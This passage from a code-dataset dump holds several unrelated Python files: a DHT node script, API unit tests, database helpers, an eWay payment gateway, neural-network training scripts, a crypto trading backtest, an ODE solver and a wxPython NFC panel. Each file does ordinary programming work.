range(3):\n\t\ttime.sleep(1)\n\ndef init():\n\tglobal args\n\tglobal my_node_no\n\tglobal connected_peers\n\tglobal my_key\n\tglobal debug_mode \n\n\tparser = argparse.ArgumentParser(description=\"A program for implementing DHT\")\n\tparser.add_argument('-i',help=\"Current node number\", type=int)\n\tparser.add_argument('-n',help=\"List of peers near you\", required=True)\n\tparser.add_argument('-s',help=\"Key value held by node\", type=int, required=True)\n\tparser.add_argument('-m',help=\"Number of bits\")\n\tparser.add_argument('-a',help=\"Send DHT key to all connected nodes\")\n\tparser.add_argument('-d',help=\"Enable debug mode\")\n\targs = vars(parser.parse_args())\n\n\tmy_node_no = args['i']\n\tconnected_peers1 = str(args['n'])\n\tconnected_peers = connected_peers1.split(\",\")\n\tmy_key = args['s']\n\t\n\n\tprint(\"All values initiated\")\n\tprint(\"Current node:{0}\".format(args['i']))\n\tprint(\"Connected node:{0}\".format(args['n']))\n\tprint(\"Key value:{0}\\n\\n--------\".format(args['s']))\n\n\nif __name__ == \"__main__\":\n\tinit()\n\tthreading.Thread( target=recieve ).start()\n\tthreading.Thread( target=send ).start()\n\n\t#timeouts.bar(3)\n\t\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"507655883","text":"\"\"\"File containing the Response class, finding the answers to a given question.\"\"\"\n\nfrom random import choice\n\nfrom .address import Address\nfrom .models import ADDRESS_FOUND, ADDRESS_NOT_FOUND, EMPTY, 
STORY_FOUND, STORY_NOT_FOUND\nfrom .parser import Parser\nfrom .find_story import find_story\n\n\ndef find_responses(message, api_key):\n \"\"\"Find the appropriate answers to a given question.\"\"\"\n if not message: # If there is no question.\n return [{\"type\": \"text\", \"value\": choice(EMPTY)}]\n\n responses = []\n words = Parser().simplify(message) # Extract the meaning words.\n for request in Parser().generate_requests(words): # For each request...\n address = Address()\n if address.find(api_key, request):\n responses.append(\n {\"type\": \"text\", \"value\": choice(ADDRESS_FOUND).format(address.address)})\n responses.append({\"type\": \"image\", \"value\": address.get_map_url(api_key)})\n\n story = find_story(address.components)\n if story:\n responses.append({\"type\": \"text\", \"value\": choice(STORY_FOUND).format(story)})\n else:\n responses.append({\"type\": \"text\", \"value\": choice(STORY_NOT_FOUND)})\n return responses\n return [{\"type\": \"text\", \"value\": choice(ADDRESS_NOT_FOUND)}]\n","sub_path":"grandpy/find_responses.py","file_name":"find_responses.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"83420603","text":"from core.api.request_api.RequestApi import RequestApi\n\n\ndef test_get_id_value_sendingValidRow_keyRow_valueAndDictionary_return1231231312aa2212133():\n row_key = \"boardObject\"\n row_value = \"(boardObject.id)\"\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n request_api = RequestApi()\n actual = request_api.get_id_value(row_key, row_value, id_dictionary)\n expected = \"1231231312aa2212133\"\n assert expected == actual\n\n\ndef test_get_id_value_sendingInvalidRow_keyAndValidRow_valueDictionary_returnNone():\n row_key = \"boardObject\"\n row_value = \"(NoneBoardObject.id)\"\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n request_api = RequestApi()\n actual = request_api.get_id_value(row_key, row_value, id_dictionary)\n expected = None\n assert expected == actual\n\n\ndef test_generate_data_sendsEmptyDataTable_returnKeyAndTokenAsDataDictionary():\n data_table = None\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n request_api = RequestApi()\n actual = request_api.generate_data(data_table, id_dictionary)\n expected = 2\n assert expected == len(actual)\n\n\ndef test_replace_variable_sendsValidDictionaryAndInputEndpoint_returnUrlConcatenatedWithId():\n id_dictionary = {\"boardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n endpoint = \"/boards/boardObject.id/labels\"\n expected = \"/boards/1231231312aa2212133/labels\"\n request_api = RequestApi()\n actual = request_api.replace_variables(endpoint, id_dictionary)\n assert expected == actual\n\n\ndef test_replace_variable_sendsIValidDictionaryAndInputEndpoint_returnUrlWithoutChanges():\n id_dictionary = {\"invalidBoardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n endpoint = \"/boards/boardObject.id/labels\"\n expected = \"/boards/boardObject.id/labels\"\n request_api = RequestApi()\n actual = request_api.replace_variables(endpoint, id_dictionary)\n assert expected == actual\n","sub_path":"test/test_RequestApi.py","file_name":"test_RequestApi.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"38700237","text":"from app import db, models\nfrom datetime import date, timedelta\n\n\ndef add_deposit(bank, account_no, account_type, rate_of_interest, date_of_investment, due_date, invested_value,\n investor):\n deposit = models.Deposit(bank=bank, account_no=account_no, account_type=account_type,\n rate_of_interest=rate_of_interest, date_of_investment=date_of_investment,\n due_date=due_date,\n invested_value=invested_value, investor=investor)\n db.session.add(deposit)\n db.session.commit()\n\n\ndef delete_deposit(account_no_to_delete):\n deposit = models.Deposit.query.filter_by(account_no=account_no_to_delete)\n db.session.delete(deposit)\n db.session.commit()\n\n\ndef get_deposits():\n deposit = models.Deposit.query.order_by(models.Deposit.due_date).all()\n return deposit\n\n\ndef get_due_deposits(next_x_days):\n today = date.today()\n next_x_days_diff = today + timedelta(days=next_x_days)\n deposits_due = models.Deposit.query.filter(models.Deposit.due_date < next_x_days_diff).order_by(models.Deposit.due_date).all()\n return deposits_due\n","sub_path":"app/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616195895","text":"#!/usr/bin/python\nimport numpy\ndef create_database ():\n\n import sqlite3 as DBI\n import sys\n db = DBI.connect('table.db')\n with db:\n cursor = db.cursor()\n\n#parameter\n cursor.execute(\"DROP TABLE IF EXISTS parameter;\") \n cursor.execute(\"CREATE TABLE parameter(id INT NOT NULL PRIMARY KEY, statusid INT, last_assigned_time INT, p1 FLOAT, p2 FLOAT, p3 FLOAT, p4 FLOAT, p5 FLOAT);\")\n\n#problemstatus\n cursor.execute(\"DROP TABLE IF EXISTS problemstatus;\") \n cursor.execute(\"CREATE TABLE problemstatus(id INT NOT NULL PRIMARY KEY, status TINYTEXT);\")\n cursor.execute(\"INSERT INTO problemstatus VALUES(0,'unsolved');\")\n cursor.execute(\"INSERT INTO problemstatus VALUES(1,'solved');\")\n cursor.execute(\"INSERT INTO problemstatus VALUES(2,'unsolvable');\")\n\n#user\n cursor.execute(\"DROP TABLE IF EXISTS user;\")\n cursor.execute(\"CREATE TABLE user(id INT NOT NULL PRIMARY KEY, name TINYTEXT);\")\n\n#result\n cursor.execute(\"DROP TABLE IF EXISTS result;\") \n cursor.execute(\"CREATE TABLE result(id INT NOT NULL PRIMARY KEY, answer FLOAT);\")\n\n#contributor\n cursor.execute(\"DROP TABLE IF EXISTS contributor;\")\n cursor.execute(\"CREATE TABLE contributor(userid INT, resultid INT);\")\n \n#joblist\n cursor.execute(\"DROP TABLE IF EXISTS joblist;\") \n cursor.execute(\"CREATE TABLE joblist(id INT NOT NULL PRIMARY KEY, parameterid INT, userid INT);\") \n\n db.commit()\n db.close()\n \n#You should specify how many new groups of parameters you want to create\ndef update_paramters(number_of_groups):\n import sqlite3 as DBI2\n db = DBI2.connect('./table.db')\n cursor = db.cursor()\n cursor.execute('SELECT parameter.id FROM parameter')\n get=cursor.fetchall()\n db.commit()\n number_of_existed_groups = len(get)\n for i in range(int(number_of_groups)):\n mu, sigma = 5, 1\n p1 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = 2, 0.25\n p2 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = -2, 0.75\n p3 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = 0.5, 0.1\n p4 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = 1.234, 0.321\n p5 = float(numpy.random.normal(mu,sigma,1))\n cursor.execute(\"INSERT INTO parameter VALUES({},0,0,{},{},{},{},{});\".format(number_of_existed_groups+i,p1,p2,p3,p4,p5))\n 
db.commit()\n \n###############################################################################\ncreate_database()\nupdate_paramters(5)\n","sub_path":"src/setUpALocalServer/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150787944","text":"\nfrom django.conf import settings\nfrom eway_api.client import RebillEwayClient, HOSTED_TEST_URL, HOSTED_LIVE_URL\nfrom billing import Gateway\nfrom billing.signals import transaction_was_successful, transaction_was_unsuccessful\nfrom billing.utils.credit_card import Visa, MasterCard, DinersClub, JCB, AmericanExpress\n\nclass EwayGateway(Gateway):\n default_currency = \"AUD\"\n supported_countries = [\"AU\"]\n supported_cardtypes = [Visa, MasterCard, AmericanExpress, DinersClub, JCB]\n homepage_url = \"https://eway.com.au/\"\n display_name = \"eWay\"\n\n def __init__(self):\n self.test_mode = getattr(settings, 'MERCHANT_TEST_MODE', True)\n self.client = RebillEwayClient(test_mode=self.test_mode,\n customer_id=settings.EWAY_CUSTOMER_ID,\n username=settings.EWAY_USERNAME,\n password=settings.EWAY_PASSWORD,\n url=self.service_url,\n )\n self.hosted_customer = self.client.client.factory.create(\"CreditCard\")\n \n def add_creditcard(self, credit_card):\n \"\"\"add credit card details to the request parameters\"\"\"\n self.hosted_customer.CCNumber = credit_card.number\n self.hosted_customer.CCNameOnCard = credit_card.name\n self.hosted_customer.CCExpiryMonth = '%02d' % (credit_card.month)\n self.hosted_customer.CCExpiryYear = str(credit_card.year)[-2:]\n self.hosted_customer.FirstName = credit_card.first_name\n self.hosted_customer.LastName = credit_card.last_name\n \n def add_address(self, options=None):\n \"\"\"add address details to the request parameters\"\"\"\n if not options:\n options = {}\n address = options.get(\"billing_address\", {})\n self.hosted_customer.Title = address.get(\"salutation\", \"Mr./Ms.\")\n self.hosted_customer.Address = address.get(\"address1\", '') + address.get(\"address2\", \"\")\n self.hosted_customer.Suburb = address.get(\"city\")\n self.hosted_customer.State = address.get(\"state\")\n self.hosted_customer.Company = address.get(\"company\")\n self.hosted_customer.PostCode = address.get(\"zip\")\n self.hosted_customer.Country = address.get(\"country\")\n self.hosted_customer.Email = options.get(\"email\")\n self.hosted_customer.Fax = address.get(\"fax\")\n self.hosted_customer.Phone = address.get(\"phone\")\n self.hosted_customer.Mobile = address.get(\"mobile\")\n self.hosted_customer.CustomerRef = address.get(\"customer_ref\")\n self.hosted_customer.JobDesc = address.get(\"job_desc\")\n self.hosted_customer.Comments = address.get(\"comments\")\n self.hosted_customer.URL = address.get(\"url\")\n\n @property\n def service_url(self):\n if self.test_mode:\n return HOSTED_TEST_URL\n return HOSTED_LIVE_URL\n\n def purchase(self, money, credit_card, options=None):\n \"\"\"Using Eway payment gateway , charge the given\n credit card for specified money\"\"\"\n if not options:\n options = {}\n if not self.validate_card(credit_card):\n raise InvalidCard(\"Invalid Card\")\n self.add_creditcard(credit_card)\n self.add_address(options)\n \n customer_id = self.client.create_hosted_customer(self.hosted_customer)\n if self.test_mode:\n customer_id = getattr(settings, 'EWAY_TEST_CUSTOMER_ID')\n pymt_response = self.client.process_payment(customer_id, \n money, \n options.get(\"invoice\", 
'test'),\n options.get(\"description\", 'test'))\n \n if not hasattr(pymt_response, \"ewayTrxnStatus\"):\n transaction_was_unsuccessful.send(sender=self,\n type=\"purchase\",\n response=pymt_response)\n return {\"status\": \"FAILURE\", \"response\": pymt_response}\n\n if pymt_response.ewayTrxnStatus == \"False\":\n transaction_was_unsuccessful.send(sender=self,\n type=\"purchase\",\n response=pymt_response)\n return {\"status\": \"FAILURE\", \"response\": pymt_response}\n\n transaction_was_successful.send(sender=self,\n type=\"purchase\",\n response=pymt_response)\n return {\"status\": \"SUCCESS\", \"response\": pymt_response}\n \n def authorize(self, money, credit_card, options = None):\n raise NotImplementedError\n\n def capture(self, money, authorization, options = None):\n raise NotImplementedError\n\n def void(self, identification, options = None):\n raise NotImplementedError\n\n def credit(self, money, identification, options = None):\n raise NotImplementedError\n\n def recurring(self, money, creditcard, options = None):\n raise NotImplementedError\n\n def store(self, creditcard, options = None):\n raise NotImplementedError\n\n def unstore(self, identification, options = None):\n raise NotImplementedError\n\n","sub_path":"billing/gateways/eway_gateway/eway_gateway.py","file_name":"eway_gateway.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"490480910","text":"#!/usr/bin/env python\n# ----------------------------------------------------------------------------\n# Copyright 2015-2016 Nervana Systems Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ----------------------------------------------------------------------------\nimport os\nfrom neon.util.argparser import NeonArgparser\nfrom neon.optimizers import GradientDescentMomentum, Schedule, MultiOptimizer\nfrom neon.transforms import TopKMisclassification\nfrom neon.callbacks.callbacks import Callbacks\n\nfrom data import make_alexnet_train_loader, make_validation_loader\nfrom network_alexnet import create_network_lrn\n\n\n# parse the command line arguments (generates the backend)\ntrain_config = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'train.cfg')\nconfig_files = [train_config] if os.path.exists(train_config) else []\n\nparser = NeonArgparser(__doc__, default_config_files=config_files)\nparser.add_argument('--subset_pct', type=float, default=100,\n help='subset of training dataset to use (percentage)')\nargs = parser.parse_args()\n\nmodel, cost = create_network_lrn()\nrseed = 0 if args.rng_seed is None else args.rng_seed\n\n# setup data provider\nassert 'train' in args.manifest, \"Missing train manifest\"\nassert 'val' in args.manifest, \"Missing validation manifest\"\ntrain = make_alexnet_train_loader(args.manifest['train'], args.manifest_root,\n model.be, args.subset_pct, rseed)\nvalid = make_validation_loader(args.manifest['val'], args.manifest_root,\n model.be, args.subset_pct)\n\nweight_sched = 
Schedule(20, 0.1)\nopt_gdm = GradientDescentMomentum(0.01, 0.9, wdecay=0.0005, schedule=weight_sched,\n stochastic_round=args.rounding)\nopt_biases = GradientDescentMomentum(0.02, 0.9, schedule=weight_sched,\n stochastic_round=args.rounding)\nopt = MultiOptimizer({'default': opt_gdm, 'Bias': opt_biases})\n\n# configure callbacks\nvalmetric = TopKMisclassification(k=5)\ncallbacks = Callbacks(model, eval_set=valid, metric=valmetric, **args.callback_args)\nmodel.fit(train, optimizer=opt, num_epochs=args.epochs, cost=cost, callbacks=callbacks)\n","sub_path":"examples/imagenet/alexnet_lrn.py","file_name":"alexnet_lrn.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399776164","text":"import grovenfctag\nimport wx\nimport wx.grid\nimport wx.propgrid as wxpg\n\nclass HexValidator(wx.PyValidator): \n def __init__(self): \n wx.PyValidator.__init__(self) \n wx.EVT_CHAR(self, self.OnChar) \n\n def Clone(self): \n return HexValidator() \n\n def Validate(self, win): \n tc = wxPyTypeCast(win, \"wxTextCtrl\") \n val = tc.GetValue() \n for x in val: \n if x not in \"0123456789abcdefABCDEF\": \n return false \n return true \n\n def OnChar(self, event): \n key = event.KeyCode\n if key < wx.WXK_SPACE or key == wx.WXK_DELETE or key > 255: \n event.Skip() \n return \n if chr(key) in \"0123456789abcdefABCDEF\": \n event.Skip() \n return \n# if not wxValidator_IsSilent(): \n# wxBell() \n return \n\nclass HexTextCtrl(wx.TextCtrl): \n def __init__(self,parent,id,text): \n wx.TextCtrl.__init__(self,parent, id, text,validator = HexValidator(), \n style=wx.TE_PROCESS_ENTER) \n self.SetInsertionPoint(0) \n self.SetMaxLength(2) \n #self.Bind(wx.EVT_TEXT, self.OnText) \n #self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown) \n# self.parentgrid=parentgrid \n self.userpressed=False \n\n def OnKeyDown(self, evt): \n self.userpressed=True \n evt.Skip() \n\n def OnText(self, evt): \n if len(evt.GetString())>=2 and self.userpressed: \n self.userpressed=False \n# wx.CallAfter(self.parentgrid.advanceCursor) \n\nclass GroveNFCTagModule:\n\n\n \n def __init__(self,pin):\n self.pin=pin\n \n def title(self):\n return \"I2C-%d: Grove NFC Tag:\"%self.pin\n \n @classmethod\n def classDescription(cls):\n return \"Grove NFC Tag\"\n \n def initSmall(self,parent,sizer):\n self.titleLabel=wx.StaticText(parent,wx.ID_ANY,self.title(),style=wx.ALIGN_CENTRE|wx.ST_NO_AUTORESIZE)\n self.blockSizer=wx.BoxSizer(wx.HORIZONTAL)\n self.blockLabel=wx.StaticText(parent,wx.ID_ANY,\"Block address: 0x\")\n self.blockEdit=wx.TextCtrl(parent,wx.ID_ANY,\"0\",validator = HexValidator())\n self.blockSizer.Add(self.blockLabel)\n self.blockSizer.Add(self.blockEdit)\n self.dataGrid=wx.GridSizer(4,4)\n oldFont=self.blockEdit.GetFont()\n newFont=wx.Font(oldFont.PointSize,wx.FONTFAMILY_TELETYPE,wx.FONTSTYLE_NORMAL,wx.FONTWEIGHT_NORMAL)\n self.blockEdit.SetFont(newFont)\n self.dataPoints=[]\n for c in range(0,16):\n dataPointEdit=wx.TextCtrl(parent,wx.ID_ANY,\"00\",validator = HexValidator())\n dataPointEdit.Bind(wx.EVT_TEXT,lambda evt, temp=c: self.OnDataPointChanged(evt, temp) )\n dataPointEdit.SetFont(newFont)\n dataPointEdit.SetMaxLength(2)\n dataPointEdit.SetMinSize((dataPointEdit.GetTextExtent(\"0000\")[0],-1))\n self.dataGrid.Add(dataPointEdit)\n self.dataPoints.append(dataPointEdit)\n sizer.Add(self.titleLabel,flag=wx.EXPAND|wx.ALIGN_CENTER,proportion=1)\n sizer.Add(self.blockSizer,flag=wx.EXPAND|wx.ALIGN_CENTER,proportion=1)\n sizer.Add(self.dataGrid)\n \n \n def 
OnDataPointChanged(self,event,pos):\n try: \n blockAddress=int(self.blockEdit.GetValue(),16)\n except ValueError:\n blockAddress=0\n grovenfctag.NFCBuffer[blockAddress+pos]=int(event.GetString(),16)\n \n def update(self):\n try: \n blockAddress=int(self.blockEdit.GetValue(),16)\n except ValueError:\n blockAddress=0\n for c in self.dataPoints:\n if not c.HasFocus() and c.GetValue()!=\"%02X\"%grovenfctag.NFCBuffer[blockAddress]:\n c.SetValue(\"%02X\"%grovenfctag.NFCBuffer[blockAddress])\n blockAddress+=1\n # set text if it isn't active\n","sub_path":"components/grovenfctagmodule.py","file_name":"grovenfctagmodule.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518952720","text":" \r\nimport pyupbit\r\nimport numpy as np\r\n\r\nnp.set_printoptions()\r\n#OHLCV (open, high, low, close, volume)로 당일 시가, 고가, 저가, 종가, 거래량에 대한 데이터\r\ndf = pyupbit.get_ohlcv(\"KRW-XRP\", interval = \"minutes30\")\r\n\r\n# 변동성 돌파 기준 범위 계산, (고가 - 저가) * k값\r\ndf['range'] = (df['high'] - df['low']) * 0.5\r\n\r\n# # range 컬럼을 한칸씩 밑으로 내림 (.shift(1))\r\ndf['target'] = df['open'] + df['range'].shift(1)\r\n\r\n# np.where (조건문, 참일때 값, 거짓일떄 값)\r\ndf['ror'] = np.where(df['high'] > df['target'],\r\n df['close'] / df['target'],\r\n 1)\r\n\r\n#누적 곡 계산()\r\ndf['hpr'] = df['ror'].cumprod()\r\ndf['MDD'] = (df['hpr'].cummax() - df['hpr']) / df['hpr'].cummax() * 100\r\nprint(\"MDD(%): \", df['MDD'].max())\r\n\r\n\r\n#추가 macd 지표\r\n\r\nmacd_short, macd_long, macd_signal = 12,26,9 #기본값 \r\ndf[\"MACD_short\"] = df[\"close\"].ewm(span=macd_short).mean() \r\n\r\ndf[\"MACD_long\"] = df[\"close\"].ewm(span=macd_long).mean() \r\n\r\ndf[\"MACD\"] = df.apply(lambda x: (x[\"MACD_short\"]-x[\"MACD_long\"]), axis=1) \r\n\r\ndf[\"MACD_signal\"] = df[\"MACD\"].ewm(span=macd_signal).mean() \r\n\r\ndf[\"MACD_oscillator\"] = df.apply(lambda x:(x[\"MACD\"]-x[\"MACD_signal\"]), axis=1) \r\n\r\ndf[\"MACD_sign\"] = df.apply(lambda x: (\"buy\" if x[\"MACD\"]>x[\"MACD_signal\"] else \"sell\"), axis=1)\r\n\r\ndf.to_excel(\"xrp.xlsx\")","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460256531","text":"\"\"\"\n本例子采用tensorflow实现rnn网络构建mnist分类器\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# 获取数据\nmnist = input_data.read_data_sets('/Users/qisc/deeplearning/deepclass/data/mnist', one_hot=True)\n\n# 超参数\nlr = 0.001\ntraining_iters = 100000\nbatch_size = 128\n\nn_inputs = 28 # 输入数据的维度\nn_steps = 28 # 时间序列跨度\nn_hidden_units = 128 # 隐藏神经元个数\nn_classes = 10 # 分类的结果\n\n# 设置tf 图的输入\nx = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_classes])\n\n# 设置权重\nweights = {\n # (28, 128)\n 'in': tf.Variable(tf.random_normal([n_inputs, n_hidden_units])),\n # (128, 10)\n 'out': tf.Variable(tf.random_normal([n_hidden_units, n_classes]))\n}\n\nbiases = {\n # (128,)\n 'in': tf.Variable(tf.constant(0.1, shape=[n_hidden_units, ])),\n 'out': tf.Variable(tf.constant(0.1, shape=[n_classes, ])),\n}\n\n\n# 定义RNN\ndef RNN(X, weights, biases):\n # 输入层 X(128, 28 setps, 28 inputs)\n # ===> X(128*28, 28inputs)\n X = tf.reshape(X, [-1, n_inputs])\n # 输入层 ===> (128batch*28setps, 128hidden)\n X_in = tf.add(tf.matmul(X, weights['in']), biases['in'])\n # 输入层 ===> (128batch, 28setps, 128hidden)\n X_in = tf.reshape(X_in, [-1, n_steps, n_hidden_units])\n # 隐藏层\n 
lstm_cell = tf.contrib.rnn.LSTMCell(n_hidden_units, forget_bias=1.0, state_is_tuple=True)\n # LSTM 被分成两部分(c_state, m_state)\n _init_state = lstm_cell.zero_state(batch_size, dtype=tf.float32)\n outputs, states = tf.nn.dynamic_rnn(lstm_cell, X_in, initial_state=_init_state, time_major=False)\n\n # 输出层\n results = tf.add(tf.matmul(states[1], weights['out']), biases['out'])\n\n return results\n\n\n# 定义优化\npred = RNN(x, weights, biases)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\ntrain_op = tf.train.AdamOptimizer(lr).minimize(cost)\n\n# 定义评估\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# 开始训练\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n step = 0\n while step * batch_size < training_iters:\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n batch_xs = batch_xs.reshape([batch_size, n_steps, n_inputs])\n sess.run([train_op], feed_dict={\n x: batch_xs,\n y: batch_ys\n })\n if step % 20 == 0:\n print(sess.run(accuracy, feed_dict={\n x: mnist.test.images[:128].reshape([-1, n_steps, n_inputs]),\n y: mnist.test.labels[:128]\n }))\n step += 1\n","sub_path":"tf_rnn.py","file_name":"tf_rnn.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583550351","text":"#! /usr/bin/python3\n\n# Explizites Mehrschrittverfahren für DGL 2. Ordnung\n\nimport numpy as np\nimport matplotlib\nimport openpyxl.utils\n\nimport matplotlib.pyplot as plt\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Font\nfrom openpyxl.chart import (ScatterChart, Reference, Series)\n\n# Double derivative of a simple damped oscillator\ndef qdd(q, v, t):\n return -d/m*v - c/m*q + F/m\n\t\ndef excel_header(data):\n\tcol_num = len(data)\n\tfor i in range(col_num):\n\t\tcurrent_cell = sheet.cell(row=1, column=(i+1))\n\t\tcurrent_cell.font = Font(bold=True)\n\t\tcurrent_cell.value = data[i]\n\t\t\ndef excel_data(name_array):\n\tt_values = Reference(sheet, min_col=2, min_row=2, max_row=sheet.max_row)\n\n\tfor i, name in enumerate(name_array):\n\t\tchart = ScatterChart()\t\n\t\tchart.title = name\n\t\tchart.x_axis.title = 't in s'\n\t\tchart.y_axis.title = var_symbols[i] + ' in ' + units[i]\n\t\tvalues = Reference(sheet, min_col=3+i, min_row=1, max_row=sheet.max_row)\n\t\tloc = 'F' + str(15*i + 1)\n\t\ttypeseries = Series(values, t_values, title_from_data=True)\n\t\tchart.series.append(typeseries)\n\t\tchart.legend = None\n\t\tsheet.add_chart(chart, loc)\n\n# Benennungen\nvar_names = ['Verschiebung', 'Geschwindigkeit']\nvar_symbols = ['q', 'v']\nunits = ['m', 'm/s']\n\t\t\n# Systemeigenschaften\nm = 0.2\nc = 5.0\nd = 0.0\nF = 2.0\n\n# Zeitschrittsteuerung\nh = 0.001\nt0 = 0.0\nt_end = 2.0\nn = (t_end - t0)/h\n\n# Anfangsbedingungen\nq0 = 0.0\nv0 = 0.0\nv_halb0 = v0 - h/2 * qdd(q0, v0, t0)\n\n# Initialisierungen\nwb = Workbook()\nsheet = wb.active\nexcel_header(['k', 't [s]', 'q [m]', 'v [m/s]'])\nsheet.append(['[AB]', t0, q0, v0])\n\nt = t0\nq = q0\nv = v0\nt_halb = t0\nv_halb = v_halb0\n\nt_array = [t0]\nq_array = [q0]\nv_array = [v0]\n\n## Loop from k = 0 to n-1\nfor k in range(int(n)): \n\n\tv_halb = v_halb + h * qdd(q, v, t)\n\n\tq_halb = (q + h / 2 * v_halb)\n\tq = q + h * v_halb \n\n\tv = v_halb + h / 2 * qdd(q_halb, v_halb, t_halb)\n\n\tt_halb = t + h/2\n\tt = t + h\n\n\t# Einzelne Daten prüfen\n\t# print(str.rjust(str(k), 3) + ' ' + str.rjust(str(round(v_halb,3)), 
6))\n\tt_array.append(t)\n\tq_array.append(q)\n\tv_array.append(v)\n\t\n\tsheet.append([k, t, q, v])\n\n## Convert list to array for graph plotting\nt_array = np.array(t_array)\nq_array = np.array(q_array)\nv_array = np.array(v_array)\n\n## Auswertung\nvalues = [q_array, v_array]\n\n# Matplotlib Graph\nfig, ax = plt.subplots(nrows=2, ncols=1, figsize=(6,7))\nfor i, type in enumerate(var_symbols):\n\tax[i].plot(t_array, values[i])# marker='o', markersize=2)\t\n\tax[i].set_xlim(left=t0, right=t_end)\n\tax[i].set_xlabel('t in s')\n\tax[i].set_ylim(bottom=np.amin(values[i]), top=np.amax(values[i]) + h/2)\n\tax[i].set_ylabel(type + ' in ' + units[i])\n\tax[i].set_title(var_names[i])\nfig.tight_layout()\nplt.show()\n\n# Chart\nexcel_data(var_names)\nwb.save('euler-msv-data.xlsx')","sub_path":"euler-msv.py","file_name":"euler-msv.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81293801","text":"import math\nimport matplotlib.pyplot as plt\nimport BezirkeUndKreuzungen_100_V1 as v100_v1\nimport BezirkeUndKreuzungen_300_V1 as v300_v1\nimport BezirkeUndKreuzungen_100_V2 as v100_v2\nimport BezirkeUndKreuzungen_300_V2 as v300_v2\nimport Streckensperrung_100_mitAlternative as s100mit\nimport Streckensperrung_100_ohneAlternative as s100ohne\nimport Threshhold_Ints as t\n\n\ndef changeFormat(l):\n res = []\n for i in range(len(l[0])):\n temp = []\n for j in range(len(l)):\n temp.append(l[j][i])\n res.append(temp)\n return res\n\n\ndef convertTime(l):\n res = []\n for t in l:\n temp = str(t[0]).zfill(6)\n tempTime = sum([int(temp[0:2]) * 3600, int(temp[2:4]) * 60, int(temp[4:6]) * 1])\n res.append((tempTime, t[1]))\n return res\n\n\ndef countForEachTimeStep(l, timeintervall):\n res = []\n for i in range(timeintervall):\n curTimeStep = [x[1] for x in l if 3600 * i <= x[0] < 3600 * (i + 1)]\n flattened = [x for y in curTimeStep for x in y]\n counted = counts(flattened)\n res.append(counted)\n return res\n\n\ndef counts(a):\n b = list(set(a))\n b.sort()\n res = []\n for i in range(len(b)):\n res.append((b[i], a.count(b[i])))\n return res\n\n\ndef removeIrrelevantLinks(a, b):\n res = []\n for i in range(len(a)):\n temp = []\n for t in a[i]:\n if t[0] in b:\n temp.append(t)\n res.append(temp)\n return res\n\n\ndef take(l, n):\n return [a[n] for a in l]\n\n\n# relevant = [12, 14, 16, 32, 34, 36, 64, 66] # Links zu Sumo\ndef plotFahrzeugerzeugung(VOLUMEN, relevant, startDurchgang, endDurchgang):\n volumen_visum = [] # für jeden Link eine Liste aller Zeitschritte\n for LINK in relevant:\n volumen_visum.append(take(eval(\"v\" + VOLUMEN + \"_v1.d0_erzeugung_\" + str(LINK)), 0))\n volumen_sumo = []\n for i in range(startDurchgang, endDurchgang):\n volumen_sumo.append(eval(\"v\" + VOLUMEN + \"_v1.d\" + str(i) + \"_erzeugung_\" + str(LINK)))\n 